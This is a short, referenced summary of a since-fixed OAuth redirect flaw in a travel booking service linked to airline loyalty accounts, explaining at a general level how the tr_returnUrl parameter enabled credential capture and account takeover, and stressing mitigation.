Introduction
A critical vulnerability was recently discovered in Acme Travel, a widely used online service for hotel and car rentals that integrates with various commercial airline services [2] [5]. This vulnerability exposed millions of users to the risk of account takeover due to misconfigured OAuth authentication processes [6].
Description
A recently discovered critical vulnerability in Acme Travel [3] [4], a popular online service for hotel and car rentals that integrates with various commercial airline services [2] [5], has exposed millions of users to the risk of account takeover due to misconfigured OAuth authentication processes [6]. This flaw allowed attackers to gain unauthorized access to any user’s account [1] [2] [3] [4] [5], impersonating victims and performing actions such as booking hotels and car rentals using the victims’ airline loyalty points [2] [3] [4] [5], as well as modifying or canceling bookings [5].
The exploit involves manipulating the tr_returnUrl parameter in the authentication flow [2] [5], which determines where user credentials are sent after successful login [5]. Attackers can redirect these parameters to a server they control, capturing the credentials when victims authenticate with the airline service. This method is particularly insidious as it utilizes a legitimate customer domain [2] [5], making detection through standard security measures challenging [5]. Furthermore, the vulnerability stems from a failure to verify that sensitive authentication credentials are sent to a legitimate domain [6], allowing attackers to send malicious links disguised as valid airline links [6], leading users to unknowingly authenticate with the attacker’s server [6]. These malicious links can be distributed via email, text messages [2] [3], or attacker-controlled websites [2] [3] [5].
Once attackers capture the credentials [2] [3] [5], they can log into the Acme Travel service as the victim [5], granting them access to personally identifiable information (PII) and the ability to perform unauthorized actions [5], such as modifying account details and creating orders [2]. The incident underscores the critical risks associated with third-party integrations and highlights the urgent need for robust security protocols to protect users from unauthorized access and manipulation. This type of vulnerability is not uncommon; similar issues have been found in other companies [6], including Booking.com and various e-commerce platforms [6]. The vulnerability has since been addressed [3] [4], emphasizing the importance of stringent security measures in safeguarding user accounts and the significant risks posed by the lack of visibility for airlines during such attacks, as the responsibility for user security lies with the third-party service provider [6]. The ongoing issue of open redirects [3], which have been a known weakness for over a decade [3], further illustrates the need for vigilance in addressing such vulnerabilities.
Conclusion
The discovery of this vulnerability in Acme Travel highlights the significant risks posed by misconfigured authentication processes, particularly in services that integrate with third-party platforms. Mitigating such vulnerabilities requires implementing robust security protocols and ensuring that sensitive credentials are transmitted only to legitimate domains. The incident serves as a reminder of the ongoing challenges in securing online services and the critical importance of vigilance in addressing known weaknesses, such as open redirects [3]. As similar vulnerabilities have been identified in other companies, it is imperative for service providers to prioritize user security and maintain stringent measures to prevent unauthorized access and manipulation.
References
[1] https://cyber.vumetric.com/security-news/2025/01/28/oauth-redirect-flaw-in-airline-travel-integration-exposes-millions-to-account-hijacking/
[2] https://salt.security/blog/api-supply-chain-attacks—the-skys-the-limit
[3] https://ciso2ciso.com/api-supply-chain-attacks-put-millions-of-airline-users-at-risk-source-www-infosecurity-magazine-com/
[4] https://www.infosecurity-magazine.com/news/api-supply-chain-attacks-millions/
[5] https://securityboulevard.com/2025/01/api-supply-chain-attacks-the-skys-the-limit/
[6] https://www.darkreading.com/application-security/oauth-flaw-exposed-millions-airline-users-account-takeovers
